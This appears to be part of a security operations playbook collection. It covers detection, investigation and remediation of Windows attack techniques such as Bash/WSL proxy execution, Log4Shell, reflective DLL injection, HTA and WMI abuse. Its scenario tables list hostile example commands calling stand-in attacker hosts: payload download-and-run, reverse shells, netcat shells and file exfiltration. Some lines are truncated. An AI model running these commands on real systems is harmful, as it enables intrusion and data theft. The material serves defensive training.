Part 6
Some of SOPs
🚨 Signed Binary Proxy Execution: Bash.exe or Gitbash.exe
🔍 1. Attack Breakdown
📝 What is Signed Binary Proxy Execution (Bash.exe or Gitbash.exe)?
Signed Binary Proxy Execution is a technique where attackers use legitimate signed binaries (e.g.,
bash.exefrom Windows Subsystem for Linux (WSL) orgitbash.exe) to proxy malicious commands or payloads.These binaries are trusted by the operating system and security solutions, making them ideal for evading detection.
📑 Why Attackers Use Bash.exe or Gitbash.exe?
Trusted Binaries: Binaries are signed by trusted vendors (Microsoft or Git).
Evasion: Antivirus and security solutions may overlook these processes.
Command Execution: Can execute arbitrary commands or scripts.
Living Off the Land: Reduces the need for downloading additional tools.
Persistence: Can create scheduled tasks or maintain backdoors.
📌 Common Attack Scenarios
Scenario
Description
Example Command
Execute Malicious Scripts via Bash
Run payloads using Bash.
bash.exe -c "curl http://malicious.com -o /tmp/payload.sh; bash /tmp/payload.sh"
Proxy Commands via Gitbash
Run malicious commands via Gitbash.
gitbash.exe -c "wget http://malicious.com/payload.sh; chmod +x payload.sh; ./payload.sh"
Download and Execute Payloads
Use bash to download and run payloads.
`bash.exe -c "wget -O- http://malicious.com/script.sh
Persistence Using Scheduled Tasks
Use Bash to create persistence.
`schtasks /create /tn UpdateTask /tr "bash.exe -c 'curl http://malicious.com/update.sh
📌 Tools Commonly Abused
Tool
Purpose
bash.exe
Command execution from Windows Subsystem for Linux (WSL)
gitbash.exe
Command execution via Git Bash
curl/wget
Downloading payloads
chmod
Modify file permissions
sh/bash
Execute shell scripts
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Identify Processes Involving Bash or Gitbash
🕵️ Inspect Command-Line Arguments
🕵️ Monitor Downloads via Bash or Gitbash
🕵️ Inspect Parent-Child Relationships
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Suspicious Bash or Gitbash Execution
🕵️ Monitor Payload Downloads via Bash/Gitbash
🕵️ Identify Bash Processes in Suspicious Folders
🕵️ Trace Parent-Child Process Relationships
🕵️ Identify Scheduled Tasks Using Bash or Gitbash
📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., bash.exe, gitbash.exe).
4663
Object access attempt (e.g., file download or script execution).
4656
Handle to an object was requested (e.g., script file handle).
7045
A service was installed on the system (e.g., persistence with bash).
📌 Focus on Event ID 4688:
Look for:
📌 Focus on Event ID 7045:
Check for scheduled tasks or services involving
bash.exeorgitbash.exe.
🕵️ 3. Investigation Techniques
1️⃣ Trace Bash or Gitbash Execution History
Check recently executed bash commands:
2️⃣ Inspect Script Files Called by Bash or Gitbash
List script files in suspicious directories:
3️⃣ Trace Parent-Child Process Tree
Identify suspicious parent processes:
4️⃣ Inspect Registry for Persistence Mechanisms
Check Scheduled Tasks:
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
📌 2. Remove Malicious Scripts
📌 3. Disable Bash or Gitbash for Untrusted Users
📌 4. Clear Scheduled Tasks Involving Bash/Gitbash
📌 5. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Monitor Bash/Gitbash Execution:
Alert on
wget,curl, or suspicious arguments.
Implement Application Control (AppLocker/WDAC):
Restrict access to
bash.exeandgitbash.exe.
Disable WSL if Not Needed:
Monitor Scheduled Tasks:
Regularly audit tasks involving
bash.exeorgitbash.exe.
Train Users:
Educate about suspicious script execution.
🧠 6. Key Takeaways
Signed Binaries Are Trusted: Attackers exploit
bash.exeandgitbash.exefor stealth.Monitor Command Arguments: Look for
curl,wget, and script downloads.Focus on Persistence Mechanisms: Scheduled tasks and startup folders.
Event IDs to Monitor: 4688, 4663, 7045.
🚨 Log4j Invocation: Advanced Threat Analysis
🔍 1. Attack Breakdown
📝 What is Log4j?
Log4j is a widely used Java-based logging library developed by the Apache Software Foundation.
The Log4Shell (CVE-2021-44228) vulnerability allows remote code execution (RCE) by exploiting how Log4j handles JNDI lookups.
Attackers can send specially crafted payloads, often containing
${jndi:ldap://attacker-controlled-server/payload}to vulnerable applications, enabling arbitrary code execution.
📑 Why is Log4j Dangerous?
Widespread Usage: Many enterprise and open-source applications rely on Log4j.
Remote Code Execution (RCE): Allows attackers to run arbitrary code.
Minimal Footprint: Exploit can be triggered with a simple HTTP request or log entry.
Persistent Access: Attackers can install backdoors or malware.
Stealthy: Exploits are often buried in legitimate logs.
📌 Common Attack Scenarios
Technique
Description
Example Payload
LDAP RCE
Execute remote payloads via LDAP.
${jndi:ldap://attacker.com:1389/Exploit}
DNS Exfiltration
Data exfiltration using DNS queries.
${jndi:dns://attacker.com/exfiltrate}
Remote Shell
Trigger remote shell execution.
${jndi:rmi://attacker.com:1099/ReverseShell}
Local Execution
Local execution bypassing detection.
${jndi:ldap://127.0.0.1/payload}
🛡️ 2. Detection Techniques
📊 Manual Inspection with Logs
🕵️ Search for Suspicious Log4j Patterns in Logs
🕵️ Identify Suspicious User-Agent Strings
🕵️ Analyze Application-Specific Logs (Java-based Apps)
🕵️ Inspect System Logs for Malicious Processes Triggered by Java Applications
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Suspicious JNDI Strings in Logs
🕵️ Monitor Network Connections to Suspicious LDAP Servers
🕵️ Identify Java Processes with Suspicious Command Line Arguments
🕵️ Monitor Suspicious Java Child Processes
🕵️ Trace Log4j Exploit Patterns in Web Requests
📊 Event Viewer Logs
Event ID
Description
4688
New process creation (e.g., spawned from Java).
4656
Handle to an object was requested (e.g., access to sensitive files).
4663
Object access attempt (e.g., files/scripts executed).
5156
Network connection allowed (e.g., outbound LDAP/DNS traffic).
4104
PowerShell script block logging.
📌 Focus on Event ID 4688:
Look for:
📌 Focus on Event ID 5156:
Identify outbound connections to LDAP/RMI servers:
🕵️ 3. Investigation Techniques
1️⃣ Trace Java Processes
Identify active Java processes:
2️⃣ Inspect Java Application Logs
Look for JNDI patterns:
3️⃣ Check Firewall Logs for Suspicious LDAP/DNS Traffic
Identify connections to uncommon LDAP or DNS servers.
4️⃣ Network Traffic Analysis
Use tools like Wireshark or Zeek to inspect suspicious outbound connections.
🔧 4. Remediation Steps
📌 1. Patch and Update Log4j
Update Log4j to version 2.17.1 or later:
📌 2. Disable JNDI Lookups
Add the following parameter:
📌 3. Block Outbound LDAP and RMI Traffic
📌 4. Remove Suspicious Artifacts
Delete malicious payloads:
📌 5. Rotate Credentials and Secrets
Rotate all credentials used in impacted systems.
📌 6. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Keep Systems and Software Updated:
Regularly patch Log4j and related dependencies.
Disable JNDI Lookups Globally:
Use JVM options to prevent remote lookups.
Network Monitoring:
Block outbound LDAP and RMI connections.
Enable Logging and Alerts:
Enable detection for
${jndi:patterns in logs.
Enable Web Application Firewall (WAF):
Block Log4j payload patterns via WAF rules.
Limit Java Process Privileges:
Run Java processes with minimal privileges.
🧠 6. Key Takeaways
Log4j Is a Critical Vulnerability: Immediate patching is essential.
Look for JNDI Patterns:
${jndi:ldap},${jndi:rmi}in logs and network traffic.Focus on Event IDs: 4688, 4656, 5156, 4663.
Disable JNDI Lookup if Unused: Add JVM parameters to prevent exploitation.
Monitor Outbound LDAP/DNS Traffic: Track external communication.
🚨 Reflective DLL Injection
🔍 1. Attack Breakdown
📝 What is Reflective DLL Injection?
Reflective DLL Injection is a stealthy technique where a DLL (Dynamic Link Library) is loaded directly into a process’s memory without using the standard Windows API
LoadLibrary()function.This technique avoids leaving traces on disk, making it difficult for antivirus software and endpoint security solutions to detect.
📑 Why Attackers Use Reflective DLL Injection?
Stealth: No need to drop a DLL file on disk.
Evasion: Bypasses standard API hooks and antivirus detections.
Persistence: Can be used to inject malicious DLLs into persistent processes.
Flexibility: Can be used in both local and remote process injections.
📌 How Reflective DLL Injection Works
Payload Delivery: The attacker delivers a malicious DLL to the target system.
Map DLL in Memory: Allocate memory in the target process.
Write DLL to Memory: Copy the DLL into the allocated memory.
Find Entry Point: Locate the
DllMainentry point of the DLL.Execute Entry Point: Call
DllMainmanually.
📌 Common Tools for Reflective DLL Injection
Tool
Description
Metasploit
Framework for delivering reflective DLLs.
Cobalt Strike
Advanced penetration testing toolkit.
PowerSploit
PowerShell scripts for injection.
Mimikatz
Credential dumping and lateral movement.
Empire
Post-exploitation framework.
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Identify Suspicious Memory Allocation in Processes
🕵️ Inspect Processes with RWX Memory Permissions
🕵️ Identify Suspicious DLL Injections via Threads
🕵️ Check Uncommon DLL Paths in MemoryGet-Process | Where-Object { $_.Modules -match "Temp" }
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Suspicious Memory Allocation
🕵️ Identify Processes with Suspicious DLL Paths
🕵️ Look for Suspicious API Calls
🕵️ Monitor DLL Injection via Known Tools
🕵️ Identify Thread Injection Activity
📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., rundll32.exe).
4689
Process termination (trace exits).
4656
Handle to an object was requested.
10
Sysmon event for memory allocation (RWX).
5156
Network connection allowed.
📌 Focus on Event ID 10 (Sysmon):
Look for:
📌 Focus on Event ID 4688:
Track processes created with reflective DLL payloads:
🕵️ 3. Investigation Techniques
1️⃣ Analyze Memory with Volatility Framework
2️⃣ Inspect Process Modules
Review loaded DLLs:
3️⃣ Inspect RWX Memory Regions
Check memory permissions:
4️⃣ Trace Parent-Child Processes
Identify the parent process:
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
📌 2. Dump and Analyze Memory
Create a memory dump for further analysis:
📌 3. Remove Malicious DLLs
📌 4. Block Suspicious API Calls
Use Windows Defender Exploit Guard to monitor API usage.
📌 5. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Enable Sysmon with Rule for RWX Memory Regions:
Monitor
VirtualAllocandWriteProcessMemory.
Implement Application Control Policies:
Block untrusted DLLs using AppLocker.
Restrict Memory Allocation Permissions:
Limit
VirtualAlloccalls from untrusted processes.
Enable Behavioral Analytics in EDR Solutions:
Monitor thread injection behavior.
Keep Systems Patched and Updated:
Apply security updates regularly.
🧠 6. Key Takeaways
Reflective DLL Injection is Stealthy: Difficult to detect via standard tools.
Monitor RWX Memory Regions: Sysmon Event ID 10 is crucial.
Focus on Parent-Child Process Relationships: Check API calls like
VirtualAllocandCreateRemoteThread.Use Threat Intelligence Tools: Validate DLL hashes on VirusTotal.
🚨 Detected Non-Baselined Csc.exe Parent Process
🔍 1. Attack Breakdown
📝 What is Csc.exe?
Csc.exe (C# Compiler) is a legitimate Microsoft binary located in
C:\Windows\Microsoft.NET\Framework\<version>\csc.exe.It is used by the .NET Framework to compile C# code into executables or DLLs.
📑 Why is Csc.exe Abused by Attackers?
Trusted Binary: Signed by Microsoft, reducing suspicion.
Execution Proxy: Can execute malicious C# payloads without being flagged.
Fileless Execution: Execute code directly from memory.
Evasion: Avoid detection by hiding behind a legitimate process.
Persistence: Can be used in scheduled tasks or registry entries.
📌 Common Attack Scenarios
Technique
Description
Example Command
Code Compilation from Temp Directory
Compile and run malicious C# code from Temp.
csc.exe /out:C:\Temp\malware.exe C:\Temp\script.cs
Reflective Code Execution
Reflectively execute C# code in memory.
csc.exe -r:System.dll -r:System.Net.dll C:\Temp\exploit.cs
Scheduled Task with Csc.exe
Persistence through scheduled tasks.
schtasks /create /tn "UpdateTask" /tr "csc.exe /out:C:\Temp\malware.exe C:\Temp\script.cs" /sc daily
Obfuscated Commands
Use obfuscation to avoid detection.
csc.exe /target:winexe /out:%TEMP%\payload.exe script.cs
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List Active Csc.exe Processes
🕵️ Inspect Csc.exe Parent Processes
🕵️ Check Recent Csc.exe Executions
🕵️ List Suspicious Csc.exe Files in Temp or Public Directories
🕵️ Analyze Compiled Executables
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Suspicious Csc.exe Parent Processes
🕵️ Identify Csc.exe Execution from Non-Standard Directories
🕵️ Detect Csc.exe Compiling Code from Suspicious Files
🕵️ Monitor Suspicious Csc.exe Network Connections
🕵️ Scheduled Task with Csc.exe
📊 Event Viewer Logs
Event ID
Description
4688
New process creation (csc.exe)
4663
Object access attempt
4656
Handle to an object requested
7045
New service installed on the system
📌 Focus on Event ID 4688:
Look for:
📌 Focus on Event ID 7045:
Look for scheduled tasks or services using
csc.exe.
🕵️ 3. Investigation Techniques
1️⃣ Trace Parent-Child Relationships
Identify the parent process:
2️⃣ Analyze Command-Line History
Review recent commands involving
csc.exe:
3️⃣ Check for Temporary C# Files
Look for
.csfiles in temporary directories:
4️⃣ Review Network Activity
Analyze network activity from
csc.exe:
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
📌 2. Remove Malicious C# Scripts
📌 3. Disable Csc.exe Execution in User Directories
Create AppLocker policy:
📌 4. Audit Scheduled Tasks
📌 5. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Enable Command-Line Auditing:
Monitor
csc.exearguments.
Implement Application Control Policies:
Block unauthorized
csc.exeusage.
Restrict Access to Compiler Binaries:
Limit access to
csc.exe.
Patch Systems Regularly:
Ensure .NET Framework is updated.
Enable Behavioral Analytics in EDR:
Detect abnormal
csc.exebehavior.
🧠 6. Key Takeaways
Monitor Non-Standard Parent Processes: Investigate unexpected parents for
csc.exe.Focus on Event IDs: 4688, 4663, 7045.
Monitor Temporary Directories: Look for
.csand.exefiles.Apply Application Control Policies: Block unauthorized compiler access.
🚨 Cscript Launching CMD or PowerShell
🔍 1. Attack Breakdown
📝 What is Cscript.exe?
Cscript.exe is the Command-Line Script Host used to execute VBScript (.vbs) and JScript (.js) files on Windows systems.
It’s a legitimate Microsoft binary located in
C:\Windows\System32\cscript.exe.
📑 Why Attackers Abuse Cscript.exe?
Trusted Binary: Signed by Microsoft and often allowed by security tools.
Script Execution: Can run
.vbsand.jsscripts silently.Proxy Execution: Attackers use it to launch cmd.exe or powershell.exe for further malicious activities.
Evasion: Script execution can be obfuscated to avoid detection.
Persistence: Used in scheduled tasks or startup entries.
📌 Common Attack Scenarios
Technique
Description
Example Command
Launch CMD via VBScript
Run commands using CMD from a VBScript.
cscript.exe script.vbs
Launch PowerShell via VBScript
Run PowerShell commands via VBScript.
cscript.exe payload.vbs
Obfuscated Payloads
Hide malicious commands in an obfuscated script.
cscript.exe /nologo C:\Temp\obfuscated.vbs
Persistence via Scheduled Task
Run a VBScript periodically to launch CMD/PowerShell.
schtasks /create /tn UpdateTask /tr "cscript.exe script.vbs" /sc daily
Fileless Execution
Execute scripts in memory without leaving traces on disk.
cscript.exe //e:vbscript -
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Identify Active Cscript Processes
🕵️ Inspect Cscript Launching CMD or PowerShell
🕵️ Check VBScript Files in Suspicious Directories
🕵️ Identify Obfuscated VBScript Execution
🕵️ Inspect Parent-Child Relationship
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Cscript Launching CMD or PowerShell
🕵️ Identify Suspicious Cscript Script Execution
🕵️ Trace Parent-Child Relationships
🕵️ Detect Obfuscated Commands via Cscript
🕵️ Monitor Scheduled Tasks Involving Cscript
📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (cscript.exe).
4663
Object access attempt (script file access).
4104
PowerShell script block execution.
7045
A new service was installed.
📌 Focus on Event ID 4688:
Look for:
📌 Focus on Event ID 4104:
Look for obfuscated payload execution via PowerShell.
🕵️ 3. Investigation Techniques
1️⃣ Trace Script Origin
Inspect script file metadata:
2️⃣ Analyze Parent-Child Process Tree
Trace back the initiating process:
3️⃣ Check Scheduled Tasks for Script Execution
Look for scheduled tasks invoking Cscript:
4️⃣ Validate Script File Hashes
Generate file hash and compare on VirusTotal:
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
📌 2. Remove Malicious Script Files
📌 3. Disable Windows Script Host
📌 4. Audit Scheduled Tasks
📌 5. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Disable Windows Script Host (If Unused).
Enable Command Line Auditing.
Monitor Scheduled Tasks for Script Execution.
Block Obfuscated Scripts via AppLocker.
Regularly Audit Script Files in Temp and Public Folders.
🚨 Payload Performing Network Activity
🔍 1. Attack Breakdown
📝 What is a Network Payload Activity?
Payloads performing network activity are malicious programs/scripts that:
Communicate with Command and Control (C2) servers.
Exfiltrate sensitive data from the target system.
Download additional payloads or tools.
Establish persistence by maintaining a communication channel with the attacker.
📑 Why Attackers Use Network Payloads?
Remote Control: Execute commands remotely on compromised systems.
Exfiltration: Transfer sensitive data to external servers.
Obfuscation: Hide network communication using encryption or legitimate services.
Pivoting: Use the compromised host as a gateway to access other systems.
Reconnaissance: Map the network infrastructure.
📌 Common Attack Scenarios
Technique
Description
Example Command
Download Additional Payloads
Use HTTP/S to download malicious tools.
powershell.exe -c "Invoke-WebRequest -Uri http://malicious.com/payload.exe"
C2 Communication
Establish persistent communication with a C2 server.
nc -e cmd.exe attacker.com 4444
Data Exfiltration
Transfer files to an external server.
curl -T sensitive_data.zip http://attacker.com/upload
DNS Tunneling
Covert communication via DNS requests.
nslookup -type=txt secret.attacker.com
Proxying Traffic
Use compromised systems as a proxy.
ssh -R 8080:localhost:80 attacker.com
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List Processes with Active Network Connections
🕵️ Inspect Recent Connections to External IPs
🕵️ Check Outbound Connections Using CMD or PowerShell
🕵️ Identify Scripts Making Network Calls
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Network Activity from Suspicious Processes
🕵️ Monitor HTTP/S Traffic from Suspicious Processes
🕵️ Identify DNS Exfiltration Patterns
🕵️ Look for Obfuscated Network Commands
🕵️ Trace Network Payloads from Scripts
📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., cmd.exe, powershell.exe).
5156
A network connection was allowed.
4663
Object access attempt detected.
4104
PowerShell script block logging.
📌 Focus on Event ID 4688:
Look for:
📌 Focus on Event ID 5156:
Check for network connections to external IPs:
🕵️ 3. Investigation Techniques
1️⃣ Trace Network Connections
2️⃣ Inspect Process Trees
3️⃣ Analyze DNS Queries
Check logs for unusual DNS queries:
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
📌 2. Block Malicious IPs and Domains
📌 3. Remove Malicious Scripts
📌 4. Clear DNS Cache
📌 5. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Monitor Suspicious Network Connections.
Restrict Script Execution with AppLocker.
Enable DNS Logging and Monitoring.
Limit Outbound Traffic to Trusted Domains.
Apply Least Privilege Principles.
🧠 6. Key Takeaways
Network Payloads are Stealthy: Focus on HTTP/S, DNS, and external IPs.
Monitor Event IDs: 4688, 5156, 4663, 4104.
Track Parent-Child Processes: Especially involving scripts.
🚨 HTA File Created
🔍 1. Attack Breakdown
📝 What is an HTA File?
HTA (HTML Application) files are executable HTML files processed by
mshta.exe, a legitimate Windows binary.HTA files allow execution of VBScript, JavaScript, or embedded executable code.
Attackers use HTA files for:
Initial Access: Spear phishing or malicious downloads.
Execution Proxy: Running scripts without restrictions.
Persistence: Scheduled tasks or startup entries.
Defense Evasion: Masking malicious intent in seemingly benign HTML code.
📑 Why Do Attackers Use HTA Files?
Trusted Binary:
mshta.exeis signed by Microsoft.Execution Flexibility: Runs VBScript, JavaScript, and embedded payloads.
Low Detection Rate: Often bypasses antivirus and endpoint defenses.
Fileless Attack: Can execute directly from memory.
Remote Execution: Supports execution via URLs.
📌 Common Attack Scenarios
Technique
Description
Example Command
HTA via Email Attachment
Malicious HTA file attached in phishing emails.
malware.hta
HTA via URL Delivery
Hosted on attacker-controlled domains.
mshta.exe http://attacker.com/payload.hta
Fileless Execution
HTA file executed directly from memory.
mshta.exe vbscript:Execute("malicious code")
HTA Dropper
HTA file drops and executes additional payloads.
mshta.exe %TEMP%\malware.hta
Persistence via Scheduled Task
HTA used in scheduled tasks.
schtasks /create /tn "Updater" /tr "mshta.exe payload.hta" /sc daily
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Search for Recently Created HTA Files
🕵️ Inspect HTA File Contents
🕵️ List Processes Executing HTA Files
🕵️ Check Parent-Child Process Relationship
🕵️ Identify Suspicious Scheduled Tasks
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect HTA File Creation
🕵️ Monitor HTA Execution
🕵️ Identify HTA File Delivered via Web
🕵️ Trace HTA Activity via Scheduled Tasks
🕵️ Find Obfuscated HTA Commands
📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., mshta.exe).
4663
Object access attempt (e.g., HTA file access).
4104
PowerShell script block execution.
7045
A new service was installed on the system.
📌 Focus on Event ID 4688:
Look for:
📌 Focus on Event ID 4663:
Object access to
.htafiles:
🕵️ 3. Investigation Techniques
1️⃣ Analyze HTA File Contents
Review HTA file for suspicious code:
2️⃣ Trace HTA Network Activity
Identify external connections made by HTA:
3️⃣ Review Parent Process
Trace the process tree:
4️⃣ Check for Persistence
Review scheduled tasks or startup entries:
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
📌 2. Delete Malicious HTA Files
📌 3. Audit Scheduled Tasks
📌 4. Block HTA Execution
Disable HTA files in Windows:
📌 5. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Disable HTA Execution via GPO:
Prevent
mshta.exefrom running.
Monitor HTA File Creations:
Regularly review
DownloadsandTempdirectories.
Enable Process Command-Line Auditing:
Track
mshta.exeexecutions.
Restrict Scheduled Task Execution:
Limit user permissions for task creation.
Educate Users:
Warn against executing unknown HTA files.
🚨 Spoofed Privileged Parent Process Detected
🔍 1. Attack Breakdown
📝 What is a Spoofed Privileged Parent Process?
A Spoofed Privileged Parent Process occurs when an attacker creates a child process under a highly privileged parent process (e.g.,
lsass.exe,explorer.exe,services.exe) to:Execute malicious payloads.
Bypass security policies.
Gain elevated privileges.
Evade detection by masquerading as legitimate activity.
📑 Why Attackers Use Privileged Parent Process Spoofing?
Stealth: Malicious processes blend in with legitimate ones.
Privilege Escalation: Gain SYSTEM or ADMIN privileges.
Evasion: Security tools may trust child processes of known legitimate parent processes.
Execution Proxy: Launch malicious code under trusted processes.
Persistence: Embed malicious activities in long-lived processes.
📌 Common Attack Scenarios
Technique
Description
Example Command
Process Injection
Inject payloads into a privileged parent process.
rundll32.exe inject.dll
Parent PID Spoofing
Manually set a process's parent PID.
CreateProcessWithParentPID
Windows API Abuse
Use APIs like CreateRemoteThread.
CreateRemoteThread(ProcessId)
Reflective DLL Injection
Inject malicious DLLs into privileged processes.
powershell.exe -exec bypass Invoke-ReflectiveDLLInjection
CMD/Powershell via Trusted Process
Execute malicious commands under trusted processes.
cmd.exe /c malicious.bat
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List Suspicious Parent-Child Relationships
🕵️ Identify Processes with Abnormal Parent-Child Pairings
🕵️ Inspect Processes with Elevated Privileges
🕵️ Check Loaded Modules in Suspicious Processes
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Suspicious Parent-Child Process Relationships
🕵️ Identify Processes Running from Suspicious Directories
🕵️ Detect Process Injection Activity
🕵️ Monitor Abnormal Child Processes of Privileged Parents
📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., cmd.exe, powershell.exe).
4663
Object access attempt.
4656
Handle to an object was requested.
7045
A new service was installed.
📌 Focus on Event ID 4688:
Look for:
📌 Focus on Event ID 7045:
New service installations by suspicious parent processes:
🕵️ 3. Investigation Techniques
1️⃣ Trace Parent Process Anomalies
2️⃣ Inspect DLLs Loaded in Suspicious Processes
3️⃣ Inspect Temporary Directories for Scripts or Payloads
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
📌 2. Quarantine Suspicious Payloads
📌 3. Audit Scheduled Tasks
📌 4. Remove Malicious Registry Entries
📌 5. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Monitor Privileged Parent Processes:
Audit child processes under
lsass.exe,services.exe,explorer.exe.
Implement Process Integrity Policies:
Use Windows Defender Application Control (WDAC).
Enable Command Line Auditing:
Capture arguments of processes launched by privileged parents.
Restrict Access to Sensitive APIs:
Prevent unauthorized
CreateRemoteThreadcalls.
Educate Security Teams:
Ensure analysts understand privileged parent process abuse.
🧠 6. Key Takeaways
Focus on Event IDs: 4688, 4663, 7045.
Monitor Process Hierarchies: Validate child processes of privileged parents.
Investigate Anomalies in Temporary Directories: Payloads often reside in
TemporAppData.Apply Least Privilege Principle: Prevent unnecessary elevated access.
🚨 Suspicious WMI Process: Active Script Event Consumer
🔍 1. Attack Breakdown
📝 What is an Active Script Event Consumer?
Windows Management Instrumentation (WMI) is a powerful system management framework used for monitoring, querying, and automation in Windows environments.
Active Script Event Consumers allow WMI to execute VBScript or JScript when specific conditions (WMI events) are met.
Attackers abuse WMI Active Script Event Consumers to:
Establish Persistence: Trigger scripts automatically on system events.
Execute Payloads Silently: Run scripts without dropping files on disk.
Evade Detection: Use native Windows tools, bypassing many security solutions.
📑 Why Attackers Use WMI Active Script Event Consumers?
Fileless Persistence: No files are dropped on disk.
Stealth: Native Windows tools are trusted by antivirus solutions.
Automated Execution: Execute malicious scripts on specific triggers.
Wide Reach: WMI is accessible across the network.
Flexibility: Supports VBScript, JScript, and Powershell execution.
📌 Common Attack Scenarios
Technique
Description
Example Command
Persistence via Event Consumers
Trigger malicious VBScript on a system event.
wmic /namespace:\\root\subscription PATH __EventConsumer CREATE
Script Execution via WMI
Use WMI to run a payload.
wmic /namespace:\\root\subscription PATH CommandLineEventConsumer
Scheduled Task via WMI
WMI triggers a payload at a specific time.
powershell.exe -c "Invoke-WebRequest -Uri http://malicious.com/payload.ps1"
Remote WMI Execution
Use WMI to execute payloads remotely.
wmic /node:<remote-host> process call create "cmd.exe /c payload.exe"
Obfuscated VBScript in WMI Consumer
Obfuscated payload in VBScript.
wmic /namespace:\\root\subscription PATH ActiveScriptEventConsumer
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List All WMI Event Consumers
🕵️ Search for Active Script Event Consumers
🕵️ Check for Command Line Event Consumers
🕵️ Identify Suspicious Scripts in WMI
🕵️ Monitor Recent WMI Events
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Active Script Event Consumers
🕵️ Identify Suspicious WMI Commands
🕵️ Trace Event Consumers with Suspicious Script Content
🕵️ Monitor Remote WMI Execution
🕵️ Detect Script-Based WMI Consumers
📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., wmic.exe).
5857
WMI Consumer Process detected.
4663
Object access attempt.
4104
PowerShell script block execution.
📌 Focus on Event ID 5857:
Look for:
📌 Focus on Event ID 4688:
Trace processes related to WMI Event Consumers:
🕵️ 3. Investigation Techniques
1️⃣ Review Active WMI Consumers
Inspect WMI Consumer activity:
2️⃣ Analyze EventConsumer Scripts
Extract script content:
3️⃣ Inspect Remote WMI Execution
Identify WMI execution across systems:
🔧 4. Remediation Steps
📌 1. Remove Suspicious WMI Event Consumers
📌 2. Disable WMI Service (if not in use)
📌 3. Audit WMI Access Permissions
📌 4. Block Malicious Scripts
📌 5. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Enable WMI Auditing.
Monitor WMI Event Consumers Regularly.
Restrict Administrative WMI Access.
Disable Unnecessary WMI Namespaces.
Apply Least Privilege Principle.
🧠 6. Key Takeaways
Focus on WMI Event IDs: 5857, 4688, 4663.
Monitor Script Text in Consumers: Look for VBScript, JScript, and PowerShell usage.
Restrict WMI Access: Apply strict permissions.
🚨 First Time Seen WSL Process Running on Machine: Advanced Threat Analysis
🔍 **1. Attack Breakdown
📝 What is WSL?
Windows Subsystem for Linux (WSL) allows users to run a Linux environment directly on Windows, without requiring a virtual machine or dual-boot setup.
WSL can execute Linux commands, scripts, and binaries directly from Windows.
📑 Why Attackers Exploit WSL?
Living Off the Land (LotL): Use trusted system components for malicious purposes.
Stealth: Many endpoint solutions may not effectively monitor WSL processes.
Fileless Execution: Malicious payloads can run directly in memory.
Cross-Platform Attacks: Ability to use Linux tools on Windows.
Bypass Security Controls: WSL processes may evade detection policies.
📌 Common Attack Scenarios
Technique
Description
Example Command
WSL Reverse Shell
Establish a reverse shell using WSL.
wsl bash -c "bash -i >& /dev/tcp/attacker_ip/4444 0>&1"
WSL Malware Execution
Run malicious binaries using WSL.
wsl /mnt/c/temp/malware.sh
Fileless Malware
Download and execute payloads directly from WSL.
`wsl curl http://attacker.com/script.sh
Persistence via WSL Cron
Set up persistent tasks via Linux cron jobs.
wsl crontab -e
Data Exfiltration via WSL
Use WSL tools for stealthy data exfiltration.
wsl scp /mnt/c/sensitive_data.txt attacker@attacker.com:/loot
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List WSL Processes Running on Windows
🕵️ Check WSL Execution History in Windows Event Logs
🕵️ Identify Recent WSL Commands Executed
🕵️ Look for WSL-Related Processes Launching Windows Commands
🕵️ Trace Parent-Child Process Relationship
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect First-Time WSL Process Execution
🕵️ Monitor Suspicious WSL Commands
🕵️ Trace WSL Network Connections
🕵️ Detect WSL Accessing Suspicious Files
🕵️ Identify Privileged Commands Executed via WSL
📊 Event Viewer Logs
Event ID
Description
4688
A new process was created (wsl.exe).
4663
An attempt was made to access an object (e.g., files accessed via WSL).
5156
A network connection was allowed (trace WSL-originating traffic).
4104
PowerShell script block execution (if WSL is invoked via PowerShell).
📌 Focus on Event ID 4688:
Look for:
📌 Focus on Event ID 5156:
Network activity:
🕵️ 3. Investigation Techniques
1️⃣ Analyze WSL Processes
Inspect currently running WSL processes:
2️⃣ Trace Network Activity from WSL
Check active network connections:
3️⃣ Inspect File Access via WSL
